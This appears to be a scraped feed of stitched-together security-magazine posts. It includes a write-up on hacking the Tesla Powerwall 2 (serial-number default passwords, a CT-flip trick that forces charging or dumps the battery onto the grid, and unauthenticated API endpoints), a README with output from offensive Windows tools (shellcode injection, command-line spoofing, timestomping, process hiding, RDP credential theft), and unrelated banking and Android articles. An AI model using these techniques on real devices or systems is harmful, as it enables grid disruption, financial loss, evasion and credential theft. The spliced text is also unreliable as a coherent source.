29810/tcp open  unknown
MAC ETH  Address: 00:01:45:07:31:17 (Winsystems)
MAC WiFi Address: 00:23:A7:AF:de:ad (Redpine Signals)

PW-UI Management Interface

The PW-GW’s management interface is accessible via WiFi. The WiFi network name is TEG-XYZ with XYZ being the last 3 digits of the PW’s serial number. TEG stands for ‘Tesla Energy Gateway’.

The password for the WiFi is the serial number. The serial number looks like this:

ST<YY><L>0001<XYZ>

YY is the built year and L is the revision number. I’ve seen revisions with letter D through to I. For example ST17H0001789would be a valid password for the Tesla PW on a WiFi network with SSID TEG-789.

The Management Interface (PW-UI) is accessible at http://192.168.91.1. The webpage will ask for a password which is again the serial number. The same management interface is accessible via the ethernet connection.

The password can not be changed. It is not possible to disable the WiFi network. I accessed mine from 50m away. It's broadcasting its SSID as well (yeha!).

THC says: Fix it! No default passwords. Do not have the WiFi accessable unless during installation.

CT fun:

The Tesla PW comes with two CT sensors. These are A/C current clamps that are installed around the LIVE wire of the incoming GRID line (house LIVE) and the LIVE wire of the SOLAR PV.

The Tesla PW uses these clamps to determine when to charge the PW from the Solar PV. E.g. the PW goes into charging mode when the Solar PV generate more electricity than the house uses.

The CT sensors have to be installed with the correct orientation or otherwise the GW gets an inverted (negative) reading. E.g. The GW thinks the house is exporting electricity rather than importing from the grid. Electricians do make mistakes and Tesla has this amazing feature to invert the reading in software if the installer fitted the CT clamps the wrong way around (sweet!)

In the PW-UI Management Interface this is possible by selecting the "Flip" check-box next to the CT Sensor name on the CT configuration page.

CHARGE & KILL THE GRID

Let's flip the reading of the GRID CT Clamp in the PW-UI. Lets assume the CT Clamp reading is +1kW (e.g. that the house is drawing +1kW from the grid). After flipping the reading the GW received -1kW and believes that the energy is being exported to the grid. The PW immediately goes into chargning mode and starts charging the PW. This causes more power to be drawn from the grid (say +2kW). The CT Clamp reports this to the GW as -2kW (remember, it's flipped) and the PW ramps up charging...and draws even more power from the grid..and so on and so on...until it's charging at full load of +5kW. All this happenes within microseconds. WARNING: The battiery gets hot very quickly and the fans start spinning at full power

There are other fun CT Clamp Flip Combinations. Another combination forces the PW to dump it's entire charge back into the grid - all at once of course.

The Problem:

1. Here in the UK we have night rate and day rate for electricty. Night rate is usually 300% cheaper and the PW is charged by night. Now an attacker can trick the PW to charge at day-rate and dump the load into the grid at night-rate, causing a financial loss to the consumer.
2. The default password is crap. It's 2019. This should not happen. An attacker can access multiple Tesla PW's at the same time. Does anyone know how the grid feels if all Tesla PW's start dumping their load back into the grid? I can also quickly change between CHARGING and DUMPING. It's really quick. We are talking sub-second switching between CHARGING and DUMPING. How does the grid feel about me oscilating this and who will die first, the PW or the sub-station?
3. It is little understood that Tesla can do all this from their HQ. By this I mean any attacker or employee with the right access to Tesla HQ can put all PW's worldwide into CHARGING and DUMPING and oscilating between these two very quickly (sub-second).

THC says: Err, do not cause any harm

So much more to research

The PW-UI managment interface has lots of other features which we have not explore (yet). It's possible to play with the grid codes such as forcing the PW into 60Hz or lowering/increasing the allowed export amperage or voltage. Someone really should take a look at this....

Imagine what somebody could to with access to the PW GW single board computer...and thus being able to send raw commands via the rs485 to the batteries....

Looks like the ssh version might be vulnerable to username enumeration. Also somebody should check serial console and vga/keyboard on the PCB.

Automate your attack

The PW-UI is a web-based interface. A simple Python script can be used to trigger any type of commands remotely. A lot of commands are uncodumented. The best way to get a list of commands is to have the Mozilla Network Monitor running during setup and testing.

Interesting API calls

Most API calls are available without authentication. Auth is required for most API calls that write to the system. It's HTTP BASIC AUTH using the same password as the WiFi password.

GET API calls:
/api/status              # Shows start_tie, up_time, version, git_hash
/api/system_status/grid_faults
/api/system_status/soe   # Shows percentage
/api/config
/api/config/completed
/api/customer
/api/sitemaster/stop     # Stops the PW
/api/sitemaster/run      # Starts the PW
/api/customer/registration
/api/installer
/api/meters
/api/meters/aggregates  # Info about CTS and loads)
/api/meters/readings
/api/networks
/api/networks/wifi_security_types
/api/operation
/api/powerwall
/api/powerwalls/status 
/api/site_info
/api/sitemaster         # Shows running, uptime, connected_to_tesla...
/api/solar
/api/status
/api/system_status/grid_faults
/api/system/testing
/api/system/update/status

POST API calls:
/api/customer/registration/legal
/api/customer/registration/skip
/api/installer
/api/login/Basic
/api/meters/{CTS ID}/invert_cts
/api/networks/default_gsm/disable
/api/operation
/api/powerwalls
/api/powerwalls/update
/api/site_info/timezone timezone: Europe/London
/api/site_info/grid_code
/api/site_info/grid_code
/api/site_info/site_name
/api/site_info/timezone
/api/system/testing
/api/system/networks/conn_tests

Example:

/api/site_info/grid_code

Do not try any of these Grid Codes (really, please do not):

AU ASS4777.2
DE VDE4105
UK GA59 21A, GA83 16A
IT CEI-021
NZ NZS47772
US: IEEE1547 Split Phase 240V 60Hz

/api/installer

Tesla Installer Account Numbers are sequential and can be retrieved with api/installer/companies. Example: Installer 1681 is ZSD Solar GmbH. This is how the installer can see your Tesla Installation and disable your tesla remotely. Good idea to change this :>

GET api/config
GET api/customer
GET completed
GET api/logout

Hacking Environment

A list of some tips and tricks. Some parts are optional and not needed to hack the PW.

Part 1: Place the PW on its own dedicated network behind a linux router. This will allow us to capture all network traffic between the PW and the Internet.

Part 2: Run the PW-UI Wizard and write down all values. Disable GSM to prevent any further firmware upgrade and to prevent Tesla from fiddling with your PW.

Part 3: We use the web browser ‘Mozilla’. Go to “about:config" and delete the value in ‘network.http.accept-encoding’. This will make it easier to read captured network traffic between our browser and the PW:

Part 4: In Mozilla open the Network Monitor by pressing ‘Cmd+Opt+E’ (Windows: Ctrl+Shift+E). That's all it takes these days. This will allow us to inspect every request to the PW UI and read the response.

More details: https://github.com/hackerschoice/thc-tesla-powerwall2-hack

The post TESLA PowerWall 2 Security Shenanigans appeared first on Hakin9 - IT Security Magazine.

Business photo created by rawpixel.com - www.freepik.com

Cyber Security is significant for every profit and non-profit making financial institutions. Banks carry vital information about their clients, and the attackers very well know this fact. So, it becomes imperative for banks and financial institutions to have robust Cyber Security in place.

Earlier it was physical thefts; then, it appeared frauds through computers, and today it is not only cyber frauds but also direct hacks into servers to get hold of personally identifiable information (PII) of customers.

As people and companies across the world perform most of their banking or financial transactions through diverse online channels, the risk of a data breach is increasing continuously. This scenario is why there is a more substantial prominence to inspect the consequence of information protection and secure transaction processes, which makes it important for financial institutions to have Cyber Security.

The reasons behind the importance of Cyber Security in banks

The key idea behind Cyber Security measures for banks is to safeguard customer assets and their transactions. As both B2C customers and organizations go cashless, financial activities are done via physical credit scanners and online checkout pages. In both scenarios, PII can be readdressed to other settings and utilized for malicious actions.

Not only does this affect B2B clients and customers. It even considerably hurt the bank while they crack to pull through the data. When the details are taken hostage, the bank or a financial institute requires paying out a significant amount to release the data and information. In turn, they lose the faith of their customers, other financial institutions, and related stakeholders.

Below are a few points that illustrate why Cyber Security is essential in the banking sector.

• Breaches lead to damage banks standing in the financial market

Data breaches are severe issues for banks as it turns in losing the public trust, and results in customer insecurity. It occurs due to feeble Cyber Security tactics, and it is not easy to recover. It is the accountability of the bank to converse with their customers directly in terms of Cyber Security measures. These measures must put off and shield their customer’s personal as well as private information. For gaining the reliance of consumers, it is significant for a bank to have a robust Cyber Security plan.

• Banks can face the consequences and penalty for FDIC non-compliance

Penalties for non-compliance can be unexpected for banks just not only monetarily but also in profoundly increased failure to notice. Having a compliance benchmark drives banks to focus on Cyber Security measures. When a bank remains compliant, it makes sure that it is meeting a security agreement and safeguarding the customer information.

• Consumers can lose money and time in case of data breaches

When a bank or financial institute leads to the data breach, consumers lose money and time. A bank may revive the unfairly spent money wholly or partly; however, it does not work well in all the scenarios. The action that happens due to the breach is effort and time consuming, leading to stress for customers. They may require cancelling the bank cards, constantly verifying financial statements, and keep an eye for technical hitches in case of any data breach scenarios.

• Consumer data is perceptive

It is tricky for consumers to manage data breaches when they become aware that their data and information has gone in the incorrect hands. In addition to cancelling the related bank cards and letting along with the frauds, a customer is all the time worried as the personal details can be utilized against an individual. Once a consumer’s private information is stolen, it soars scarily and can get out of control. So Cyber Security is more significant to banks and financial institutions as they carry private data of so many consumers who trust them.

The risks allied with banking on the web and mobile 

The other examples of probable issues with Cyber Security in banking on the internet and mobile include:

• Risks through mobile apps

More individuals use their bank accounts through mobile applications. Many of these individuals tend to have least or no security, and this makes the impending of attack much bigger. Hence, safe banking software solutions are necessary to avert malicious activities.

• Breaches at 3rd party organizations

As banks have advanced their Cyber Security, hackers now try shared banking systems and 3rd part networks to execute frauds. If these are not as safeguarded as the bank, the hackers can get access effortlessly.

• Boost in risks due to cryptocurrency hacks

In addition to the typical or conventional frauds, hacks have been boosted in the maturing space of cryptocurrency. Since the industry is not entirely sure how to operate Cyber Security software for banking in this evolving market, the capabilities of attackers to do frauds has increased. They try to grab massive amounts of this currency, which has low awareness levels and as it swiftly jumps in value.

Defend cyber threats to the banking industry with highly secured software

When you explore at the current state of security online, you must consider enrichment or the entire alternative of your existing defense applications. Here is some important stuff to look at on the planet of banking software development.

• Having Security Audits - A regular audit is essential before any new Cyber Security software is enabled. The review discloses the power and weak spots of the active setup. Furthermore, it offers suggestions that can assist in saving money while also allowing precise investments.
• Enabling Firewalls - Cyber Security banking setup does not only comprise applications. It also needs the precise hardware to obstruct attacks. With a reorganized firewall, banks can block unethical activities ahead of reaching other components of the network.

• Use of Anti-malware Applications - While a firewall update boosts protection, it won’t prevent attacks unless anti-malware applications are upgraded. Old software setup might not contain the newest rules and virus signatures. In turn, it can fail to spot a potentially terrible attack on the systems.

• Multi-factor Authentication (MFA) - This process is crucial to safeguard clients who use mobile or web applications for banking transactions. Using MFA prevents attackers from reaching the system network as it has diverse levels of protection.

• Biometrics - It enables protection through retina scans, thumbprints, and facial recognition to substantiate a user’s distinctiveness.

• Automatic Logout - Many sites and apps enable a user to remain logged in if they allocate it. Thus, they can use their information at any time without using login credentials. However, this also allows attackers to without difficulty attain your vital records. Automatic logout trims down this by concluding a user’s access subsequent to a few minutes of idleness.

• Awareness and Education - All of the above measures can boost Cyber Security in the banking business. However, they can’t assist if customers persist in accessing their information from undefended locations or unacceptably holding their login credentials. This is why awareness and education are essential. When banks inform their customers of consequences connected to these several vulnerabilities, it may move them to alter their day to day practices to safeguard them from attacks.

About the Author: 

Mrudul Shah is a CTO of Technostacks Infotech which is a mobile app development company in India & USA. He is helping his entire development team and global clients to access new technologies, interests in learning and sharing IT technology news trends.

The post Reasons Why Cybersecurity Is Important In Banking by Mrudul Shah appeared first on Hakin9 - IT Security Magazine.

The king is dead, long live the king. I am starting a new repo with code samples in C#. My heart is still with PowerShell <3, lets face it using in-line C# in PowerShell is a much nicer experience than actually using C#! However, threat emulation has to evolve over time and so does the tooling.

Pwn?

SwampThing

SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state, rewrite the PEB, resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones. Think for example about launching a wmic xsl stylesheet for code execution but faking an innocuous wmic command.

C:\>SwampThing.exe -l C:\Windows\System32\notepad.exe -f C:\aaa.txt -r C:\bbb.txt
      /
     :;                \
     |l      _____     |;
     `8o __-~     ~\   d|     Swamp
      "88p;.  -._\_;.oP         Thing
       `>,% (\  (\./)8"
      ,;%%%:  ./V^^^V'
;;;,-::::::'_::\   ||\
8888oooooo.  :\`^^^/,,~--._
 oo.8888888888:`((( o.ooo888
   `o`88888888b` )) 888b8888
     b`888888888;(.,"888b888\
....  b`8888888:::::.`8888.
 `:::. `:::OOO:::::::.`OO' ;
   `.      "``::::::''.'        ~ b33f ~

[>] CreateProcess -> Suspended
[+] PE Arch                       : 64-bit
[+] Process Id                    : 10568
[+] PEB Base                      : 0xA3C2431000
[+] RTL_USER_PROCESS_PARAMETERS   : 0x20DA9760000
[+] CommandLine                   : 0x20DA9760070
[+] UNICODE_STRING |-> Len        : 66
                   |-> MaxLen     : 68
                   |-> pBuff      : 0x20DA9760658

[>] Rewrite -> RTL_USER_PROCESS_PARAMETERS
[+] RtlCreateProcessParametersEx  : 0xEAADF0
[+] RemoteAlloc                   : 0xEA0000
[+] Size                          : 1776
[?] Success, sleeping 500ms..

[>] Reverting RTL_USER_PROCESS_PARAMETERS
[+] Local UNICODE_STRING          : 0xEBC4D0
[+] Remote UNICODE_STRING.Buffer  : 0x20DA9B10000
[+] pRTL_USER_PROCESS_PARAMETERS  : 0x20DA9870FE0
[?] Success rewrote Len, MaxLen, Buffer..

DesertNut

DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate). The pertinent part here is that this does not use any suspect thread creation API's, instead as implied it hijacks window callbacks. DesertNut includes two flags: "-l" to list all potential properties that could be hijacked and "-i" to inject shellcode into explorer and execute notepad. Note that this POC is only designed for x64 (tested on Win10 RS5 & Win7) since it requires custom shellcode with a specific callback function prototype. For further details please see this post by Hexacorn and this post by modexp.

C:\> DesertNut.exe -i
           ,                        '           .        '        ,
   .            .        '       .         ,
                                                   .       '     +
       +          .-'''''-.
                .'         `.   +     .     ________||
       ___     :             :     |       /        ||  .     '___
  ____/   \   :               :   ||.    _/      || ||\_______/   \
 /         \  :      _/|      :   `|| __/      ,.|| ||             \
/  ,   '  . \  :   =/_/      :     |'_______     || ||  ||   .      \
    |        \__`._/ |     .'   ___|        \__   \\||  ||...    ,   \
   l|,   '   (   /  ,|...-'        \   '   ,     __\||_//___
 ___|____     \_/^\/||__    ,    .  ,__             ||//    \    .  ,
           _/~  `''~`'` \_           ''(       ....,||/       '
 ..,...  __/  -'/  `-._ `\_\__        | \           ||  _______   .
              '`  `\   \  \-.\        /(_1_,..      || /
                                            ______/''''

[+] Searching for Subclass property..
[>] PID: 10928, ImageName: explorer
    |-> ParentClassName: Progman, ChildClassName: SHELLDLL_DefView
[+] Duplicating Subclass header..
[>] hProc: 0x378
[>] hProperty: 0x6B14DD0
    |-> uRefs: 2, uAlloc: 3, uCleanup: 0
    |-> dwThreadId: 5804, pFrameCur: 0
    |-> pfnSubclass: 0x7FFA20E42280 --> comctl32!CallOriginalWndProc (?)
    |-> uIdSubclass: 0, dwRefData: 0x7FFA2E4C07D0
[+] Allocating remote shellcode..
    |-> Sc Len: 344
    |-> Sc Address: 0x3220000
[+] Rewriting local SUBCLASS_HEADER..
[+] Allocating remote SUBCLASS_HEADER..
    |-> Subclass header Len: 48
    |-> Subclass header Address: 0x3260000
[+] Updating original UxSubclassInfo subclass procedure..
[+] Trigger remote shellcode --> notepad..
[+] Restoring original UxSubclassInfo subclass procedure..
[+] Freeing remote SUBCLASS_HEADER & shellcode..

C:\> DesertNut.exe -l
           ,                        '           .        '        ,
   .            .        '       .         ,
                                                   .       '     +
       +          .-'''''-.
                .'         `.   +     .     ________||
       ___     :             :     |       /        ||  .     '___
  ____/   \   :               :   ||.    _/      || ||\_______/   \
 /         \  :      _/|      :   `|| __/      ,.|| ||             \
/  ,   '  . \  :   =/_/      :     |'_______     || ||  ||   .      \
    |        \__`._/ |     .'   ___|        \__   \\||  ||...    ,   \
   l|,   '   (   /  ,|...-'        \   '   ,     __\||_//___
 ___|____     \_/^\/||__    ,    .  ,__             ||//    \    .  ,
           _/~  `''~`'` \_           ''(       ....,||/       '
 ..,...  __/  -'/  `-._ `\_\__        | \           ||  _______   .
              '`  `\   \  \-.\        /(_1_,..      || /
                                            ______/''''


[+] Subclassed Window Properties
[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x1BC84BF0, hParentWnd: 0xA0710, hChildWnd: 0x100650
    |-> ParentClassName: Shell_TrayWnd, ChildClassName: Start

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x1BC84C70, hParentWnd: 0xA0710, hChildWnd: 0x1C064C
    |-> ParentClassName: Shell_TrayWnd, ChildClassName: TrayDummySearchControl

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x12A64F0, hParentWnd: 0x1C064C, hChildWnd: 0x800E8
    |-> ParentClassName: TrayDummySearchControl, ChildClassName: Button

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x12A58F0, hParentWnd: 0x1C064C, hChildWnd: 0x1504A4
    |-> ParentClassName: TrayDummySearchControl, ChildClassName: Static

[>] PID: 10928, ImageName: explorer
    |-> hProperty: 0x12A5870, hParentWnd: 0x1C064C, hChildWnd: 0x110814
    |-> ParentClassName: TrayDummySearchControl, ChildClassName: ToolbarWindow32

[...Snipped...]

WindfarmDynamite

WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread). The POC overwrites a process level WNF subscription callback which can be triggered by signaling a WNF state name. There currently exists little functionality in Windows to monitor WNF activity. WindfarmDynamite includes two flags: "-l PID" to list all WNF subscriptions for a specific process and "-i" to inject shellcode into explorer and execute notepad. Note that this POC is only designed for x64 (tested on Win10). For further details please see this talk by Alex Ionescu & Gabrielle Viala and this post by modexp.

C:\> WindfarmDynamite.exe -i
.  ..  ..___           .__                 ,
|  ||\ |[__  _.._.._ _ |  \  .._  _.._ _ *-+- _
|/\|| \||   (_][  [ | )|__/\_|[ )(_][ | )| | (/,
                           ._|

[+] Validating Process..
[>] PID: 996, ImageName: explorer
    |-> hProc: 632, Arch: x64

[+] Leaking local WNF_SUBSCRIPTION_TABLE..
[>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208

[+] Remote WNF_SUBSCRIPTION_TABLE lookup..
[>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x5A9120
    |-> NameTable Flink: 0x4A6CA10, NameTable Blink: 0x5BB050

[+] Finding remote subscription -> WNF_SHEL_LOGON_COMPLETE
[>] SubscriptionId: 0xB89, State Name: WNF_SHEL_LOGON_COMPLETE
    |-> WNF_USER_SUBSCRIPTION: 0x49C8E38
    |-> Callback: 0x7FFD82F58C60 => twinui.dll!DllCanUnloadNow
    |-> Context: 0x2A12F40 => N/A

[+] Allocating remote shellcode..
[>] Sc Len: 344
[>] Sc Address: 0x27A0000

[+] Rewriting WNF subscription callback pointer..
[+] NtUpdateWnfStateData -> Trigger shellcode
[+] Restoring WNF subscription callback pointer & deallocating shellcode..

C:\> WindfarmDynamite.exe -l 4132
.  ..  ..___           .__                 ,
|  ||\ |[__  _.._.._ _ |  \  .._  _.._ _ *-+- _
|/\|| \||   (_][  [ | )|__/\_|[ )(_][ | )| | (/,
                           ._|

[+] Validating Process..
[>] PID: 4132, ImageName: vmtoolsd
    |-> hProc: 640, Arch: x64

[+] Leaking local WNF_SUBSCRIPTION_TABLE..
[>] TblPtr: 0x7FFD99CB5FA8, NtdllRVA: 1335208

[+] Remote WNF_SUBSCRIPTION_TABLE lookup..
[>] rNtdllBase: 0x7FFD99B70000, rWNFSubTable: 0x56B2F0
    |-> NameTable Flink: 0x58EA30, NameTable Blink: 0x58F070

[+] Reading remote WNF subscriptions..
[>] SubscriptionId: 0x931, State Name: WNF_ENTR_EDPENFORCEMENTLEVEL_POLICY_VALUE_CHANGED
    |-> WNF_USER_SUBSCRIPTION: 0x4BB5B88
    |-> Callback: 0x7FFD87505DF0 => edputil.dll!EdpIsUIPolicyEvaluationEnabledForThread
    |-> Context: 0x0 => N/A

[>] SubscriptionId: 0x8FA, State Name: WNF_DX_MODE_CHANGE_NOTIFICATION
    |-> WNF_USER_SUBSCRIPTION: 0x5B9658
    |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126
    |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F9, State Name: WNF_DX_MONITOR_CHANGE_NOTIFICATION
    |-> WNF_USER_SUBSCRIPTION: 0x5B9708
    |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126
    |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F8, State Name: WNF_SPI_LOGICALDPIOVERRIDE
    |-> WNF_USER_SUBSCRIPTION: 0x5BA368
    |-> Callback: 0x7FFD96E5B230 => SHCore.dll!Ordinal126
    |-> Context: 0xA1ECB0 => N/A

[>] SubscriptionId: 0x8F4, State Name: WNF_RPCF_FWMAN_RUNNING
    |-> WNF_USER_SUBSCRIPTION: 0x58F828
    |-> Callback: 0x7FFD98610980 => rpcrt4.dll!NdrTypeSize
    |-> Context: 0x0 => N/A

MaceTrap

MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders. These elements can be changed individually, in bulk or can be duplicated from an existing file or folder. Time permitting I will update MaceTrap to include comprehensive PE compile time stomping as well (header, import table, export table, debug directory, resources and fixing up the checksum).

C:\> MaceTrap.exe

    /-|-\   MACE
   [++++||<<>><<>>|===|+
    \-|-/    TRAP             ~b33f~


 >--~~--> Args? <--~~--< -l (-List) List FileTime information for a file or folder -s (-Set) Set FileTime information for a file or folder -d (-Duplicate) Duplicate FileTime information from a file or folder -t (Time) String DateTime representation; requires quotes if it contains spaces. All undefined elements are set randomly (YYYY-MM-DD is required!): =>  1999-10-20
                    => "2001-01-02 14:13"
                    => "2019-02-19 01:01:01.111"
-c (-Create)      Boolean flag, overwrite CreationTime
-a (-Access)      Boolean flag, overwrite LastAccessTime
-w (-Write)       Boolean flag, overwrite LastWriteTime

 >--~~--> Usage? <--~~--<

# List all FileTime elements
MaceTrap.exe -l C:\Windows\System32\kernel32.dll
# TimeStomp all FileTime elements
MaceTrap.exe -s C:\Some\Target\file.folder -t "2019-02-19 01:01:01,111"
# TimeStomp CreationTime & LastWriteTime; here HH:MM:SS,MS are randomized
MaceTrap.exe -s C:\Some\Target\file.folder -t 1999-09-09 -c -w
# TimeStomp a file/folder by duplicating the FileTime information from an existing file/folder
MaceTrap.exe -s C:\Some\Target\file.folder -d C:\Windows\System32\kernel32.dll

UrbanBishop

UrbanBishop is a small POC I wrote while I was testing Donut. If you haven't seen or used Donut I highly recommend you have a look at the magic TheWover & odzhan are doing there! This POC creates a local RW section in UrbanBishop and then maps that section as RX into a remote process. Once the shared section has been established the shellcode is written to the local section which then automatically propagates to the remote process. For execution UrbanBishop creates a remote suspended thread (start address is set to ntdll!RtlExitUserThread) and queues and APC on that thread, once resumed with NtAlertResumeThread the shellcode executes and the thread exits gracefully on completion. The POC can be adapted for inline shellcode but that was not my use case. I tested UrbanBishop on x64 Win10/Win7.

C:\> UrbanBishop.exe -i 3380 -p C:\Users\b33f\Desktop\sc.bin -c
   _O       _____     _
  / //\    |  |  |___| |_ ___ ___
 {     }   |  |  |  _| . | .'|   |
  \___/    |_____|_| |___|__,|_|_|
  (___)
   |_|          _____ _     _
  /   \        | __  |_|___| |_ ___ ___
 (_____)       | __ -| |_ -|   | . | . |
(_______)      |_____|_|___|_|_|___|  _|
/_______\                          |_|
                       ~b33f~

|--------
| Process    : notepad
| Handle     : 828
| Is x32     : False
| Sc binpath : C:\Users\b33f\Desktop\sc.bin
|--------

[>] Creating local section..
    |-> hSection: 0x338
    |-> Size: 31361
    |-> pBase: 0x2470000
[>] Map RX section to remote proc..
    |-> pRemoteBase: 0x16967970000
[>] Write shellcode to local section..
    |-> Size: 31361
[>] Seek export offset..
    |-> pRemoteNtDllBase: 0x7FFDE64A0000
    |-> LdrGetDllHandle OK
    |-> RtlExitUserThread: 0x7FFDE650CF10
    |-> Offset: 0x6CF10
[>] NtCreateThreadEx -> RtlExitUserThread <- Suspended.. |-> Success
[>] Set APC trigger & resume thread..
    |-> NtQueueApcThread
    |-> NtAlertResumeThread
[>] Waiting for payload to finish..
    |-> Thread exit status -> 0
    |-> NtUnmapViewOfSection

AtomicBird

AtmoicBird, is a crude POC to demo the use of EasyHook in .Net payloads combined with Costura to pack resources into a single module. AtomicBird has two functions, (1) Hook MessageBoxA => print to console / modify parameters => unhook and (2) Hook NtQuerySystemInformation->SystemProcessInformation, search the linked list of SYSTEM_PROCESS_INFORMATION Structs to find powershell processes and unlink them. The second function requires that you inject the .Net PE into a process that uses NtQuerySystemInformation (Process Explorer was used for testing), you can do that with execute-assembly or with donut by generating shellcode. AtmoicBird was only tested on x64 Win10.

              .---.        .-----------
             /     \  __  /    ------
            / /     \(  )/    -----  Atomic
           //////   ' \/ `   ---       Bird
          //// / // :    : ---
         // /   /  /`    '--
        //          //..\\      ~b33f~
               ====UU====UU====
                   '//||\\`
                     ''``
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
Called ==> SystemProcessInformation
[!] Found Powershell => rewriting linked list
[!] Found Powershell => rewriting linked list

[...Snipped...]

RemoteViewing

RemoteViewing, is quick POC to demo RDP credential theft through API hooking using EasyHook for .Net payloads combined with Costura to pack resources into a single module. This is adapted from a post by @0x09AL that you can read here. To use this you have to compile RemoteViewing and then turn it into shellcode with Donut after which you have to inject that shellcode into mstsc. RemoteViewing will RC2 encrypt any credentials it captures and write them to disk. You can then use Clairvoyant to decrypt the file in memory, read out the results and delete the file.

Windows API

SystemProcessAndThreadsInformation

While working on a side project I had to access out-of-process thread information, to do this I used NtQuerySystemInformation -> SystemProcessAndThreadInformation. As it may be helpful for reference I wrote a small wrapper round this function to list process and thread information for a specific PID. Note that I am not extracting all available information from SYSTEM_PROCESSES and SYSTEM_THREAD_INFORMATION, feel free to extend the output with a pull request.

C:\> SystemProcessAndThreadsInformation.exe -p 4508

[+] Process Details
    ImageName           : powershell.exe
    ProcessId           : 4508
    ParentPid           : 8256
    HandleCount         : 701
    ThreadCount         : 25
    SessionId           : 1
    Priority            : 8
    CreateTime          : 0d:22h:0m:31s:876ms
    UserTime            : 0d:0h:0m:0s:328ms
    KernelTime          : 0d:0h:0m:0s:281ms
    WorkingSetSize      : 73.52734375 MB
    PeakWorkingSetSize  : 73.5859375 MB
    PageFaultCount      : 26896

[+] Thread Details
[>] TID: 9832, Priority: 9
    |-> StartAddress: 0x7FFB84833670
    |-> Created: 0d:22h:0m:31s:876ms, uTime: 0d:0h:0m:0s:46ms, kTime: 0d:0h:0m:0s:93ms
    |-> WaitTime: 5843708, WaitReason: UserRequest
    |-> State: Wait, ContextSwitches: 232

[>] TID: 5552, Priority: 8
    |-> StartAddress: 0x7FFB84833670
    |-> Created: 0d:22h:0m:31s:970ms, uTime: 0d:0h:0m:0s:15ms, kTime: 0d:0h:0m:0s:15ms
    |-> WaitTime: 5843460, WaitReason: WrQueue
    |-> State: Wait, ContextSwitches: 38

[>] TID: 15716, Priority: 8
    |-> StartAddress: 0x7FFB84833670
    |-> Created: 0d:22h:0m:31s:970ms, uTime: 0d:0h:0m:0s:15ms, kTime: 0d:0h:0m:0s:0ms
    |-> WaitTime: 5843460, WaitReason: WrQueue
    |-> State: Wait, ContextSwitches: 30

[...Snipped...]

More details: https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing

The post Sharp-Suite: A modular, high-performance, modern init daemon in C# appeared first on Hakin9 - IT Security Magazine.

Official page: https://andrax.thecrackertechnology.com/ 

The post ANDRAX v4 DragonFly - Penetration Testing on Android appeared first on Hakin9 - IT Security Magazine.

With the advent of advanced technologies, the conventional way of living has transformed. People utilize the latest gadgets that add value to their day to day life and the smartphone is one of such devices. 

According to Statista, the number of mobile phone users across the world is supposed to pass the five billion mark by 2019. In the second quarter of 2018, 88 percent of all smartphones sold to end users were phones with the Android operating system, the same source stated.

These numbers prove that Android is the biggest mobile app development platform. With Android app development, companies can reach out to a large user base, increase sales, and generate revenue. Through frequent technology updates, Android allows businesses to develop highly functional, secure, flexible, extensible and scalable apps in order to meet the ever-changing market trends. 

Lots of innovations are happening when it comes to Android app development trends. This post covers ten leading trends that may disrupt the mobile app industry. 

#1. Artificial Intelligence (AI) 

Introducing Artificial Intelligence in Android apps, businesses can improve user experiences by enabling customers with personalized offerings. The technology allows businesses to understand customers’ behavior, journey, product preferences, and many more details. With the data-driven approach, companies can formulate a better strategy for customer engagement by responding to their demands quickly. 

E-commerce businesses develop Android apps with AI to explore endless business opportunities, address clients’ specific needs, and generate adequate revenue. Harnessing the potential of AI, organizations can develop chatbots, advanced analytics systems, and machine learning techniques to deliver the best user experiences.

#2. Internet of Things 

An IoT based Android app creates a convenient environment for users to connect to IoT enabled devices. According to Statista, the number of connected devices worldwide was 15.41 billion in 2015 and it is expected to grow to 75.44 billion in 2025. It is an almost 60 billion increase in IoT enabled devices. 

Being the leading OS, Android will be the biggest partaker in this trend. It will be the preferred choice of businesses and developers for IoT app development. The mixture of IoT and Android apps can build IoT for Home, IoT for Workplace, IoT for Enterprises, and more.

#3. Augmented Reality (AR) & Virtual Reality (VR)

The cognitive technologies enable users with immersive experiences by augmenting digital elements on the real world and creating a completely artificial environment as per their requirements. Building highly interactive AR and VR solutions using Android app development services, helps businesses elevate the user experience by offering them lifelike visual experiences. 

Lots of businesses are using AR and VR applications for marketing, product demonstration, sales, process learning, maintenance and repair, and more. The enterprise-oriented use cases of AR and VR involve training of products and process, on filed assistance, and so on. 

#4. Cloud-based Android App Development

To address customers' increasing demands and expectations, developers have started creating highly complex and feature-rich mobile apps. As the latest Android apps come with a lot of design elements, features, and functions, they require more space on the user's smartphone. 

With cloud-based Android applications, developers can seamlessly run data-driven apps, as cloud technology allows for real-time data loading, management, and processing. The essence of cloud-based Android apps is their innate behavior to easy access anytime and anywhere. 

#5. Android Instant Apps

Google Play Instant allows users to use an app or game without any installation process. Android Instant Apps are stored and operated from the cloud, so users need not download them. The key benefit of such apps is that they do not take up extra space on the user's smartphone. Also, users can eliminate the clutter of unnecessary applications on their mobile devices. 

